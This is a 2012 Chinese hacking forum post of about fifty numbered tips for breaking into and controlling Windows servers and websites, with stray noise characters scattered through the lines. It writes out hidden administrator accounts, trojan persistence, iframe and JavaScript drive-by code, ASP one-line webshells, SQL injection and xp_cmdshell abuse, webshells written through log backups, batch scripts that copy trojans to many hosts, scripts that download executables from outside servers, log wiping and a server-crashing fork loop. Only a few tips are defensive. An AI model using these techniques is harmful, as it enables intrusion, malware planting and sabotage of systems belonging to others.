找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2294|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,4 \) l6 O& p* z* |$ O4 K
cacls C:\windows\system32 /G hqw20:R
7 t# C/ Q( T3 K5 V/ Q. z1 b' n思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入3 ~' ]( J# t+ O& y
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
$ |+ L% ^, T0 ?% A3 D0 k4 _. |5 _- y/ n' t$ a
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。. l) ]- Y4 H4 n+ n9 o) Z9 m# E
2 e% Y; O4 J0 w' u1 ^
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
/ a% Y% q+ b* A$ Y
; R2 C( ]0 d  I4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
& L* T" G7 F( G3 ~, y4 A9 F6 v* X! ~0 s  g& p( D( `
5、利用INF文件来修改注册表' t- z% c  m" y
[Version]  r0 D7 d# L/ T4 N, t- y5 ?
Signature="$CHICAGO$"
7 m  P9 \, n7 L6 A# H  F, j[Defaultinstall]- p( z" q% U4 z1 W' d% u- W
addREG=Ating! |2 }& i2 r# r+ x9 G+ G4 s
[Ating]
  C. z# m+ T8 h" O9 KHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
/ }( D4 O/ S6 M以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
0 E& o6 P, w' a' t8 Srundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
3 z! L+ o" E3 z  {8 C) g0 ~  n其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
* U0 T+ |% _% W% WHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
! G2 |8 `$ q; y1 P6 o, vHKEY_CURRENT_CONFIG 简写为 HKCC$ |1 y" |1 p4 S( V# ^) r6 K, o6 f
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值* Z& J4 o" g5 S, [0 n/ t1 X
"1"这里代表是写入或删除注册表键值中的具体数据
! i* o, S' M% e, q
0 j. g3 |) {5 X9 T. m6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,1 |1 {  ?; N- }
多了一步就是在防火墙里添加个端口,然后导出其键值  I4 w" f$ B0 x! C4 q+ p
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]. v) P6 H' |% ?( J

$ l' T$ H/ A+ A3 W7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽$ n8 t2 @  d% U/ B! H# E
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
0 A; j/ E" J0 ?" q: x' a
. a: I  M2 Z7 }0 G/ i  O5 h) Z8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。  ]; z. t9 v7 O% Q' f! v

# |, s& P" b, F* x8 M# X9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,9 s3 u: `' O3 b# g
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。# }7 E% x) _* }5 C2 n/ x. A1 |$ l

* d( v( X! Z0 }( F4 }/ ?10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”; R# _, |( K/ A& Y. e2 O9 ^
2 }5 a- x& z' i5 n: k- G9 Q
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
7 N4 i7 e! J$ g2 m$ |- M1 z用法:xsniff –pass –hide –log pass.txt
; n" l& L  u! G2 K' l4 K5 {5 u6 k' w( a
12、google搜索的艺术# B, u/ m: r1 ~
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”  `* B: n6 n' t, O# p7 t
或“字符串的语法错误”可以找到很多sql注入漏洞。
- @9 ]( R( x: y: R' \8 \
  R+ h( Z. P8 f* `2 f. b13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
. w) ]: K9 }! B4 s  A8 z, P# j
# @5 e5 U7 I0 i& H/ |14、cmd中输入 nc –vv –l –p 1987* Z. A. Y! S; Y/ l0 j4 \
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
5 l$ r1 K; |0 ?9 ^! P# X0 H
: j, H; s3 D8 l+ L15、制作T++木马,先写个ating.hta文件,内容为+ ~7 A: p- G) Q( P& I
<script language="VBScript">
$ ^$ ?4 w2 t, t! dset wshshell=createobject ("wscript.shell" )
; J2 z5 E# o& fa=wshshell.run("你马的名称",1)
0 C  g( _  P) s: @" a) }window.close
* _  l( @' C5 |; M! l  M</script>
5 f3 }. l2 r2 n2 o9 L2 q- k+ G再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
7 K, S. E' I) v! X' q# |2 V1 b) }9 k+ X- Z( P
16、搜索栏里输入
: I# q1 y6 B$ C  u  ]关键字%'and 1=1 and '%'='
0 q5 I6 }, k' y8 O/ T关键字%'and 1=2 and '%'='1 s& O0 ~: f( \9 s: i0 f  E* E
比较不同处 可以作为注入的特征字符
! N( y2 `0 g1 M3 H7 ^( p7 m) s1 K1 N) ]3 U1 w) Q) ^9 [2 L
17、挂马代码<html>
2 y2 ?) {+ l" Y3 k5 o<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>. E1 @* [7 o) E& q
</html>% N' g& R) g- F

3 U! j  i2 w- C18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,& K/ `! r" i+ s
net localgroup administrators还是可以看出Guest是管理员来。
, ~- `  p& d8 E& j; `3 q, G) g4 w) S. q* |! K& r2 n- h
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等& Y2 f5 p2 c/ q
用法: 安装: instsrv.exe 服务名称 路径
/ U: \3 ?6 u1 F$ n% @卸载: instsrv.exe 服务名称 REMOVE
$ o* U6 b" g7 q/ A2 {* [: }! R! u/ V4 @7 Q" D( _
: P8 u; E1 b$ ~, w: M+ P# p9 R, Q
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉" u5 B7 U$ U+ V
不能注入时要第一时间想到%5c暴库。# J# z$ e, T" |" J" o
6 i5 V' d# ?2 R* v; b
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~+ B( O: A! q+ I4 B  z3 U0 t3 o  c
2 A3 d" X- f" }# k) N4 d
23、缺少xp_cmdshell时
/ h# d: |" @& F: M8 M5 J# X尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'" J3 P0 Y: u: ~1 i6 }: Z8 S( u
假如恢复不成功,可以尝试直接加用户(针对开3389的)
2 Z6 q6 O- M  q8 Ydeclare @o int
$ B3 u0 n" F9 W/ Cexec sp_oacreate 'wscript.shell',@o out$ b! l( j" K: y
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
0 B. B) W7 x7 i" d
! q1 H6 d- Z* g6 x24.批量种植木马.bat  W0 D# F5 z( H0 t" Z
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
' z, U6 C) g+ h8 zfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
8 R; a" X. d; o扫描地址.txt里每个主机名一行 用\\开头
/ n% X; _/ v) `- j) R
# Y% K  j3 N( h! F( u25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。1 g8 q' X9 V$ m, U, ^( D

( g9 _2 H* ?4 s$ e26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.$ A1 a4 Z; |% E# m+ O8 j
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
/ q$ E+ {# \0 D) S. `1 o- o.cer 等后缀的文件夹下都可以运行任何后缀的asp木马( |1 ^1 ]7 G, q7 K

* _# e  g8 Z/ v, c" G: E3 G27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP' J4 |; _* W: X" ?& C) D
然后用#clear logg和#clear line vty *删除日志
; L) M  a& l0 c6 g' S& i( K% y& L7 H8 r7 k+ ?$ A2 r
28、电脑坏了省去重新安装系统的方法) I4 c- Y0 S( H+ b1 Y
纯dos下执行,$ k  W0 @, u7 _3 _7 a1 p4 H) U4 f
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
& l4 W# p3 l9 B% q( w* F- l9 {, _2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config4 J9 M+ q2 a) z5 h' a

3 X6 X& c" Y2 |1 _: _' m* [29、解决TCP/IP筛选 在注册表里有三处,分别是:
* M* G: t6 Q( `! eHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
. A1 O9 {  T9 p, ~. b& NHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip- }: a- _. s: H& C
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip3 Z  d: U4 K) f! ~. ]$ I# b
分别用
' f* P0 G% _1 G8 K# |" O0 \5 cregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
& h8 M6 r- V3 [regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
# R+ ^4 m& t6 [regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
  a. A, N9 W+ O( L9 B2 l命令来导出注册表项# h6 a- s" a: h2 U8 w! }
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
5 B& ]0 R/ t' ^8 ?* Q/ E/ V9 W5 I7 h改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用2 M3 Z! n+ _8 ^5 F$ A# a
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
& ?4 ?$ b; o" Y* A1 D# b
5 R% `! W1 X* E: A) q30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U& r3 D! J. r; ^9 W4 t: A
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
* x$ B' p5 ^3 F1 O2 Q
" L) E; b6 m0 ]  P- f3 ~31、全手工打造开3389工具$ E/ I! @1 m) h6 w0 E, J* n
打开记事本,编辑内容如下:) z5 e% W8 G3 R- _9 U9 m
echo [Components] > c:\sql: a& O# ]; f& U$ B" W
echo TSEnable = on >> c:\sql
$ Q4 p5 C) A+ Rsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
% d8 y1 ^9 p! ~0 N编辑好后存为BAT文件,上传至肉鸡,执行0 f5 t& u/ [. n" r: @

, \! E+ G  T" |/ [* ~/ K/ d32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
9 Y0 v8 |! u) y1 O
3 H$ m" c/ f9 V33、让服务器重启
6 ^) m9 ~3 r% H& O写个bat死循环:
" l* E+ v% g4 n2 e6 ]8 X+ [6 V@echo off/ n- g: _$ w0 N% s% h# ]
:loop1
0 S+ w- u0 F0 z# R8 ^! {cls; M1 c* h+ h# p& e/ G8 u: d6 F3 l
start cmd.exe7 J( O- e+ w5 t. B0 |  Q7 B) p
goto loop17 X* J* d% N# k5 I+ r  p# {
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启$ M5 n; j: M# }- @3 t( c1 X

( ~1 F0 o4 f1 H1 n3 {0 e) ?34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
1 Q+ U$ g8 P: v  x* X8 ~7 [2 N1 B@echo off7 Y+ u2 \5 h2 F
date /t >c:/3389.txt
1 j; W6 ?$ a: b" S0 v1 @time /t >>c:/3389.txt4 l4 B  q9 k. c6 i2 Y3 h# C' {
attrib +s +h c:/3389.bat7 c- _- t- Q2 d5 t( K2 M( H
attrib +s +h c:/3389.txt; q2 l" F$ I6 R& E% _; i9 \
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
$ Z( J* ?; G: F3 q" M并保存为3389.bat
2 I8 s0 A$ H7 _# R8 f* I5 {打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号# k2 M6 G/ w. M/ ?$ H4 \
% Y; H7 E5 X1 x2 w, h! V# E2 H' f/ x
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
* m5 O% G1 T9 G% G+ c: Dstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)+ q" u, ^$ K3 H0 y5 p
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
/ E! Z' y/ I9 l0 x  \" a- U2 }* V; @$ Y: u- b: X
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
3 p, W. A  N9 Z' d- a. ?echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
: `& b* q* a) ]+ X" q7 z+ Uecho 你的FTP账号 >>c:\1.bat //输入账号
3 Y: o: k2 J5 X# z0 m1 d( eecho 你的FTP密码 >>c:\1.bat //输入密码
9 {3 N$ c9 x" K7 T6 `1 @+ u9 w* zecho bin >>c:\1.bat //登入& @0 v8 r6 Q7 b
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
( V1 K9 O$ J: B+ C% Y- `0 v' fecho bye >>c:\1.bat //退出( p) U/ G5 H" G5 T5 U- }
然后执行ftp -s:c:\1.bat即可6 o9 j3 w, g% l/ _3 d- Q, \

6 s- x  Q4 r( z4 c, H& ]2 H37、修改注册表开3389两法
* V9 @" t+ T/ r0 k5 \  w' J! m(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
9 Q8 M0 ]# _! C& O4 Z/ R9 P; ^echo Windows Registry Editor Version 5.00 >>3389.reg
( o6 g5 Z7 r7 J* A/ Eecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
7 k0 y$ b3 H# B0 i* M+ }echo "Enabled"="0" >>3389.reg' l* N. I) v8 k0 ^% j$ ]8 s
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
% e; \0 s. T: z: wNT\CurrentVersion\Winlogon] >>3389.reg
. }0 V) E6 L  E$ W$ g7 C- E+ recho "ShutdownWithoutLogon"="0" >>3389.reg
% T  d/ N0 _5 ?: Techo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
5 R$ j% U9 t2 I% ~5 B$ E>>3389.reg8 r: ]+ ^6 Y- V
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
6 p/ I' b- n5 d3 k* |3 C2 _echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
6 B* a$ {! J' ~: H>>3389.reg
1 ^+ `4 ?. D3 R8 S7 Zecho "TSEnabled"=dword:00000001 >>3389.reg
7 A( Q% g: @8 J3 ]0 Z. O! G, v+ @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg8 X# s- i8 m. P1 N
echo "Start"=dword:00000002 >>3389.reg) c0 C6 w$ Q, u& Z+ A% ?
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]9 d* Y8 E  p; b  N
>>3389.reg
1 L+ C# i; A3 b" g+ y/ iecho "Start"=dword:00000002 >>3389.reg
2 s) w3 [6 m7 }) @. ?echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
7 p! m. G- H2 H! k. lecho "Hotkey"="1" >>3389.reg+ C0 g' n7 F5 x  Q( U9 \: h/ J' X' a5 E
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
8 H, q( T, D. Q1 nServer\Wds\rdpwd\Tds\tcp] >>3389.reg7 i) V8 H" w$ H6 [5 R* p3 V; q8 K' K
echo "PortNumber"=dword:00000D3D >>3389.reg
6 m1 k1 N/ O; v2 u. I( ^/ yecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
7 X' z2 M% u: d. `" h6 p8 M- ?Server\WinStations\RDP-Tcp] >>3389.reg
$ X* D5 i* B. G. j* |+ _! `  h; M8 uecho "PortNumber"=dword:00000D3D >>3389.reg, t4 O3 t: Z, H7 X
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
& y3 V: y# M3 Q% S; e8 e" B" j(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)* K6 \% j% W7 i4 s
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
& H3 y3 w9 a0 H(2)winxp和win2003终端开启1 e6 ?3 T# i3 n' C: T% @! y, _
用以下ECHO代码写一个REG文件:8 D6 N% \+ G  G+ d$ x$ W  B
echo Windows Registry Editor Version 5.00>>3389.reg
, @- ]9 w8 N0 G  H. techo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
% g$ k+ L5 s- ^5 s9 ]Server]>>3389.reg
* |# |+ G0 B. ?3 y5 E% M& ]echo "fDenyTSConnections"=dword:00000000>>3389.reg
, [# J+ _9 k$ f# O( Secho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal. ~/ o( {7 D; _* i; `
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
# N/ S& l2 c! W- ?& [4 ^echo "PortNumber"=dword:00000d3d>>3389.reg  g5 ^0 j, k: J4 a& o0 f1 T! v
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal; S: @, w% |8 g# H) f8 w
Server\WinStations\RDP-Tcp]>>3389.reg% b$ J* g& Y9 c4 }2 h% C
echo "PortNumber"=dword:00000d3d>>3389.reg
8 x2 x; H& z( ~4 V; V然后regedit /s 3389.reg del 3389.reg; M8 U/ D3 P( v* U) l( e
XP下不论开终端还是改终端端口都不需重启6 a* ?/ E% W/ P% c; e+ o, X- v
& X7 G3 b; A1 ^9 u2 c; J; t
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃" t% G8 W5 o" o; Y8 G: h' \' Y
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa', b2 d) t& h3 ~% R

# |9 p4 E5 [! N5 a$ p: ?' ?% I39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
" e2 i& D: m% O* M- }(1)数据库文件名应复杂并要有特殊字符0 i) Y/ [9 }" K) A1 x7 ~4 y7 ]
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
% @8 i+ q% ~1 l7 s$ i) v将conn.asp文档中的
0 X7 h& i- U/ Y- HDBPath = Server.MapPath("数据库.mdb")
# ]. h6 q6 r& [& g: a* l+ Cconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath( C1 g9 d( F2 F9 u% Z, f
' Y' Z6 H$ Y/ {! M' Y
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置6 u# c7 `/ X0 k
(3)不放在WEB目录里
% ]. z$ H5 P& _$ p8 ~( S" l# K& a0 B) `/ T/ k2 r# p
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
8 c- a: k; R9 }/ y* Y- B可以写两个bat文件
: \6 M3 l0 [9 s# y* L( g@echo off2 o' ?& B" c* u, o/ ]1 M
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe2 z& X/ k1 F1 @
@del c:\winnt\system32\query.exe4 p& O9 n8 c$ M; X
@del %SYSTEMROOT%\system32\dllcache\query.exe2 Z# n2 w7 ~4 m" y+ O4 t
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的% M! M+ H) ?/ s# Y
6 O! I; Z3 f/ ~5 B" F( ?: l6 g& a
@echo off4 m. T2 z  ]7 t2 w) }, W* p
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
: X9 z4 g8 t( A4 m: l* Q- T@del c:\winnt\system32\tsadmin.exe
) Y7 N/ `$ |& A7 f! [( X$ u@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex2 X; i* E) e. O3 H; C6 v! }% `5 w
0 c1 l8 N% x* J" e+ M+ z
41、映射对方盘符5 B9 F6 @/ K4 b: ?; Q2 O3 m% ~" s
telnet到他的机器上,
0 a7 V2 s% H; onet share 查看有没有默认共享 如果没有,那么就接着运行
1 X9 h2 c. i4 ?net share c$=c:
: n" K$ B! V; U( u! ynet share现在有c$" n! }: t. j  |: `0 {
在自己的机器上运行+ N4 T2 j) ?, P( `- H8 R+ x8 R1 F
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
7 x3 U  V& F7 ^' o% p" v8 x! Q. M) x, k
42、一些很有用的老知识
3 [8 ^2 i! ]5 \& ?0 }; Z* f; stype c:\boot.ini ( 查看系统版本 )& h4 y: I' \' [  r" K
net start (查看已经启动的服务)
  t& d9 _' [# y- ]  n. V% Zquery user ( 查看当前终端连接 )
4 F9 v+ Z% z9 O* Unet user ( 查看当前用户 )1 J' c, |$ v4 M/ G" r  q: o% b
net user 用户 密码/add ( 建立账号 )
2 M, y$ w1 t; W: X, y1 hnet localgroup administrators 用户 /add (提升某用户为管理员)! i. E7 U$ C  g' m2 e( S3 X
ipconfig -all ( 查看IP什么的 )3 k' w0 D3 X% W; o$ A
netstat -an ( 查看当前网络状态 )' B9 L$ j: g3 x8 d' D' r
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)/ D7 @( A0 {* y! j" i9 c
克隆时Administrator对应1F4
# X/ O% w6 z' _, Lguest对应1F5
' S5 F9 B0 ~" Z0 \" h+ B* a9 ]tsinternetuser对应3E8* D) }4 J: j! S/ s
# M( s0 |# r; y# D+ B3 U7 I/ d6 v
43、如果对方没开3389,但是装了Remote Administrator Service
" w3 d) D4 @( A用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
" U0 e- q* S* y3 W& s解释:用serv-u漏洞导入自己配制好的radmin的注册表信息9 y; M3 {# B( Q3 S! l' z5 C5 D# ]+ |
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin". z8 \. w9 u) W. i) H+ [

& Y! l0 U, C6 c5 L# F. W44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)8 w9 ^+ u& A+ E& z2 R  ^% N
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
% A! a$ J) M( `2 \+ j' c. A
3 G3 B" [. s' u45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
, u3 o& D1 J2 q% ~4 y  B' j5 b9 D+ N: B: Jecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
: _; u5 g- Z# J- t* \^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
& M4 O' W% q+ K/ eCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =: |* R, w( S  k6 E3 i& n) e, X' h# v
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs: L7 U) b( X* R! b6 H9 Y
(这是完整的一句话,其中没有换行符)
% w7 ?4 t) k! P/ x$ u: w然后下载:# T2 m: T: @% H  q- i
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
1 u# X0 c1 \9 ?! A- |/ H. [8 r- i1 {/ k! m4 Z, b# ~1 b2 t- L
46、一句话木马成功依赖于两个条件:0 i7 K" ~, o' d  H  r$ M4 [: R
1、服务端没有禁止adodb.Stream或FSO组件7 ]9 s! x2 b- [6 q
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
7 I* [5 a4 P. U" J' W2 e1 n
- B* a: l/ N* m/ W47、利用DB_OWNER权限进行手工备份一句话木马的代码:6 t; {# r. A6 M9 P7 s
;alter database utsz set RECOVERY FULL--
" f8 X" x6 x2 o& x5 }- L;create table cmd (a image)--6 Q; B; D6 @( x; M8 i
;backup log utsz to disk = 'D:\cmd' with init--
/ }9 r4 N# M3 P* ]1 Q;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
9 x! l, f& d# C8 U. l: B;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--2 c5 ~( T7 ]/ A3 O) y5 L
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。7 a: s( T) H0 V

8 B& B; I2 |9 G: n% H3 a7 _& T48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
& \7 y2 u2 V% i. A) P9 Y' g
" q5 s, W9 u9 ~6 L用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options2 R4 L! w+ V* K. P) u
所有会话用 'all'。+ r* k( G& I( o6 `6 L
-s sessionid 列出会话的信息。
6 F/ O: I3 l! T! \-k sessionid 终止会话。0 H" y" u8 Q2 l( g) ~
-m sessionid 发送消息到会话。3 k' B# C2 S* ^2 O6 O5 m
1 {- e- p2 J, B  z6 C: P
config 配置 telnet 服务器参数。
$ P, F8 j# C) }9 ?$ w2 q/ S& p( L3 h/ B' i* V
common_options 为:5 P& T9 P- ]! H1 S& p% \& f7 b
-u user 指定要使用其凭据的用户% q& \6 [# H/ d5 \
-p password 用户密码
/ g3 b7 [& @" P6 D# J4 B3 w0 _" F* k1 z* t- i* r
config_options 为:
% ]( f0 ^, n; m$ _6 M$ c- B; `dom = domain 设定用户的默认域! B" y: R% x  Y3 o6 u. q8 X2 L
ctrlakeymap = yes|no 设定 ALT 键的映射
6 [- n4 P% `, u9 c% Itimeout = hh:mm:ss 设定空闲会话超时值6 ^% q  P. M# J& S
timeoutactive = yes|no 启用空闲会话。8 r  F  Z' z+ s6 p
maxfail = attempts 设定断开前失败的登录企图数。
- m! F2 _3 V+ Omaxconn = connections 设定最大连接数。; x! B3 w/ ], Q
port = number 设定 telnet 端口。% n% D& ]; ^* Z/ H5 A' ?; [$ e
sec = [+/-]NTLM [+/-]passwd( `0 ?' j0 |3 l9 U4 r6 k- Z* |, z
设定身份验证机构( C6 }0 H6 ?: N, c4 {& p6 N
fname = file 指定审计文件名。. N( V3 c* h( m7 g; z( h
fsize = size 指定审计文件的最大尺寸(MB)。; F: f( H$ |- C7 s$ L) l
mode = console|stream 指定操作模式。
$ \5 h3 `7 E5 Jauditlocation = eventlog|file|both5 q, ~' y9 @6 k" l8 E4 i; P
指定记录地点: s* H$ z& a2 }) h$ b. J
audit = [+/-]user [+/-]fail [+/-]admin0 D) E$ l/ o; q7 l
: l  U# N* A: `4 K  D% t
49、例如:在IE上访问:7 f$ r# ]( y& V. [  Q
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/+ n% W$ s! X9 H' @& v, a
hack.txt里面的代码是:3 f* f1 V- g0 T
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
3 J2 \7 |, q- k. S% m- I7 c* \- K4 D- g把这个hack.txt发到你空间就可以了!
( @% a# F5 [1 }) s- z$ o这个可以利用来做网马哦!
. y; S! x) ]3 t$ ]! }- D8 ?5 _: \% E, F
50、autorun的病毒可以通过手动限制!
6 s% q- ~# i, Q0 v2 b! Q1 c& X1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!7 R  W& Y% K0 [: L. k4 {. \
2,打开盘符用右键打开!切忌双击盘符~4 ]6 c8 B9 R% p2 N  ^
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
/ G% j" O6 M. h% s; I- s" F9 w1 ?3 z$ J" Z/ Z" T3 L# X
51、log备份时的一句话木马:3 w- @6 j) v4 Z1 \
a).<%%25Execute(request("go"))%%25>; Z# @8 O& F% \1 r% T+ T
b).<%Execute(request("go"))%>
